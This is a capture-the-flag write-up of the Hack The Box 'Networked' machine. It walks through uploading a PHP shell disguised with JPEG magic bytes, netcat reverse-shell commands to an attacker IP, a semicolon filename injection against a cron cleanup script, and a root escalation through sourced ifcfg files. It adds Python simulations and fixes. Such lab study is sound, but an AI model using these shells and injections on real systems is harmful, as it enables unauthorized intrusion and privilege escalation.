Hack The Box – Networked Box Writeup By Nikhil Sahoo

Introduction

Back with a new blog. Today we will go through the walkthrough of the Hack The Box machine Networked, which retired recently. It is a fairly easy Linux box, so without further ado let's begin.

Recon

We’ll start with our recon by doing a Nmap scan.

nmap -sC -sV 10.10.10.146

The scan shows port 80 open, so let's check that first in the browser.

Nothing interesting on the front page. Running dirb against it turns up /backup, which serves a tar archive that we download.

Exploitation

Extracting it gives us four PHP files. upload.php looks interesting, so let's check whether it is live on the box.

It does exist, and the first thing that comes to mind is to upload a PHP reverse shell through it. Let's try that.

The upload only accepts what it considers a valid image, so we prepend the magic bytes of an image format to our PHP file and give it an image extension to match. Lists of file signatures (magic bytes) are easy to find online; I used the JPEG/JFIF header "ÿØÿà..JFIF.." (hex FF D8 FF E0, two length bytes, then JFIF). The check only looks at the start of the file, so the PHP code that follows the header is untouched and will still run if the server ends up handing the file to the PHP interpreter.

You can use any PHP reverse shell you like.

It uploads fine. The next task is to find where the uploaded image/shell lives. Recall that the backup contained a PHP file named photos.php; let's navigate there.

Our uploaded shell is listed there. Open it in a new tab and pass a cmd parameter to check for code execution.

It works! Now start a listener and put a Netcat reverse shell in the cmd parameter. A bare nc 10.10.14.166 4848 only opens a connection, so attach a shell to it, for example nc 10.10.14.166 4848 -c bash (the nc on this box accepts -c, as the cron step below also relies on).


Let’s move to the home directory and try to read the user flag.

Oops, Permission Denied.

We probably have to get there through another user first.

Checking the crontab.guly file, we see that it runs check_attack.php every 3 minutes (and, being guly's crontab, it runs as guly).

Let's analyze the code of check_attack.php.

In short, the script iterates over the files in the web server's /uploads/ directory, passes each filename to the check_ip() function from lib.php, and for any name that does not look like an IP address it sends a mail and deletes the file. The deletion is done with:

exec("nohup /bin/rm -f $path$value >/dev/null 2>&1 &");

Here $value is the filename itself, pasted into the command string without any escaping. Because exec() runs the string through a shell, a filename containing a semicolon terminates the rm command, and whatever follows it runs as a second command. With a file named ";nc 10.10.14.166 6969 -c bash" the shell sees (with $path expanded to the uploads directory):

nohup /bin/rm -f $path;nc 10.10.14.166 6969 -c bash >/dev/null 2>&1 &

The rm fails harmlessly (its output is discarded) and the nc runs, as guly, every time the cron job fires. Two details matter: a filename cannot contain a slash, so the payload cannot use full paths such as /bin/bash and must rely on commands found via PATH, and the job runs from guly's cron, so the shell comes back as guly.

If this works we should get a reverse shell. So create an empty file named ";nc 10.10.14.166 6969 -c bash" in the uploads directory (quote the name so your own shell does not interpret the semicolon),

open a listener on port 6969, and wait up to 3 minutes.

And we got our user shell and the user flag.
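The whole cron-job bug reduces to building a shell command out of a filename. The following Python is an added example of mine, not code from the box or the post: it rebuilds the vulnerable command the way check_attack.php does, rebuilds it safely with proper quoting, runs both through sh against a constructed uploads directory, and reports whether the injected command executed. The payload uses touch instead of nc so it runs offline, nohup and the trailing & are dropped so the result is synchronous, and the allow-list regex stands in for the page's check_ip() and is an assumption.

```python
"""Command injection via an unescaped filename, as in check_attack.php, beside the fix.
Added example with constructed input; the allow-list regex is an assumption."""
import os
import re
import shlex
import subprocess
import tempfile

# Stand-in for the filename shape the cron job expects; the real check_ip() lives in lib.php.
EXPECTED_NAME = re.compile(r"^[0-9]{1,3}(?:[._][0-9]{1,3}){3}(?:\.[A-Za-z0-9]+)?$")

# Constructed attacker filename: the ';' ends rm, then a second command runs.
# 'touch' replaces the post's 'nc 10.10.14.166 6969 -c bash' so this runs offline.
MALICIOUS_NAME = ";touch injected"


def vulnerable_cmd(path: str, value: str) -> str:
    """Same string check_attack.php hands to exec(): $path$value pasted in unquoted.
    (nohup and the trailing '&' are omitted so the simulation stays synchronous.)"""
    return f"/bin/rm -f {path}{value} >/dev/null 2>&1"


def safe_cmd(path: str, value: str) -> str:
    """Fixed form: the whole file path is one quoted word (escapeshellarg() in PHP)."""
    return f"/bin/rm -f {shlex.quote(path + value)} >/dev/null 2>&1"


def expected_name(value: str) -> bool:
    """Defence in depth: refuse to touch names that do not match the expected shape."""
    return EXPECTED_NAME.fullmatch(value) is not None


def simulate(builder, filename: str = MALICIOUS_NAME) -> dict:
    """Create `filename` in a scratch uploads dir, run the cleanup command through sh,
    and report whether the injected command ran and whether the file was removed."""
    with tempfile.TemporaryDirectory() as uploads:
        path = uploads + "/"
        target = os.path.join(uploads, filename)
        open(target, "w").close()
        subprocess.run(["sh", "-c", builder(path, filename)], cwd=uploads,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return {
            "injected": os.path.exists(os.path.join(uploads, "injected")),
            "removed": not os.path.exists(target),
        }


if __name__ == "__main__":
    print("vulnerable:", simulate(vulnerable_cmd))  # injected command ran, file kept
    print("safe:      ", simulate(safe_cmd))        # only the file was deleted
    print("name allowed:", expected_name(MALICIOUS_NAME))
```

In PHP the equivalent of shlex.quote() is escapeshellarg(); better still is to skip the shell entirely with unlink() and to apply the allow-list before the name is used anywhere.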

Privilege Escalation

Now moving on for our root flag.

Let's start with sudo -l to see which commands the guly user can run through sudo.

According to the output, guly can run the script /usr/local/sbin/changename.sh with sudo.

Let's read that bash script.

It prompts for four values, writes them into an ifcfg file and then tries to create a new interface, guly0, from it. This is where I got a bit stuck.

But the RedHat/CentOS network scripts have a known weakness: the ifcfg-* files are sourced as shell, so a value containing a space is split, and whatever follows the space is executed as a command. Typing

Nikhil whoami

for the interface name therefore runs whoami, and since the script is invoked through sudo, it runs as root.

You can find more details here.

So run the script with sudo, and when it asks for the interface name type any word followed by a space and /usr/bin/bash; the network scripts will execute that bash as root and drop us into a root shell. Anything will do for the other parameters.

That gives us the root flag. For more clarity, look at the ifcfg-guly file that the script writes: our input lands on a line of the form KEY=<word> /usr/bin/bash, which, when the file is sourced by the network scripts, is read as a variable assignment followed by a command.

That explains it all.
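To show the mechanism without touching a real network stack, here is an added example of mine (not the box's changename.sh) that writes a constructed ifcfg-guly file the way such a script would from the four answers, sources it with sh the way the network scripts do, and checks whether the trailing word executed; a hardened writer that validates each value is shown beside it. The key names NAME, PROXY_METHOD, BROWSER_ONLY and BOOTPROTO, the allow-list regex and the touch payload (standing in for /usr/bin/bash) are assumptions.

```python
"""An ifcfg-* file is sourced as shell, so an unvalidated value with a space becomes a
command. Added example with constructed input; key names and the regex are assumptions."""
import os
import re
import subprocess
import tempfile

# Conservative allow-list for ifcfg values (assumption): no whitespace, quotes or metachars.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_.:-]+$")
KEYS = ("NAME", "PROXY_METHOD", "BROWSER_ONLY", "BOOTPROTO")  # assumed key names


def write_ifcfg(directory: str, answers: dict) -> str:
    """What a naive script does: KEY=value lines written straight from user input."""
    path = os.path.join(directory, "ifcfg-guly")
    with open(path, "w") as fh:
        for key in KEYS:
            fh.write(f"{key}={answers[key]}\n")
    return path


def write_ifcfg_validated(directory: str, answers: dict) -> str:
    """Hardened writer: reject any value the shell could parse as more than one word."""
    for key in KEYS:
        if not SAFE_VALUE.fullmatch(answers[key]):
            raise ValueError(f"refusing unsafe value for {key}: {answers[key]!r}")
    return write_ifcfg(directory, answers)


def source_runs_command(writer, name_value: str) -> bool:
    """Write the file with `name_value` as the interface name, source it the way the
    network scripts do (`. /path/ifcfg-guly`), and report whether 'pwned' was created."""
    answers = {"NAME": name_value, "PROXY_METHOD": "none",
               "BROWSER_ONLY": "no", "BOOTPROTO": "dhcp"}
    with tempfile.TemporaryDirectory() as scratch:
        try:
            path = writer(scratch, answers)
        except ValueError:
            return False  # hardened writer refused; nothing was sourced
        subprocess.run(["sh", "-c", '. "$1"', "sh", path], cwd=scratch,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return os.path.exists(os.path.join(scratch, "pwned"))


if __name__ == "__main__":
    # "guly0 touch pwned" mirrors the post's "anything /usr/bin/bash" answer.
    print("naive writer, injected name:", source_runs_command(write_ifcfg, "guly0 touch pwned"))
    print("validated writer, injected name:", source_runs_command(write_ifcfg_validated, "guly0 touch pwned"))
    print("validated writer, plain name:", source_runs_command(write_ifcfg_validated, "guly0"))
```

The defensive takeaway matches the hardened writer: never let user input reach an ifcfg file unquoted and unvalidated, and do not grant sudo on a script that writes files the network scripts will later source as root.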

That's all for now. See you next time.

You can also have a look at my previous Hack The Box article, the Jarvis box walkthrough.
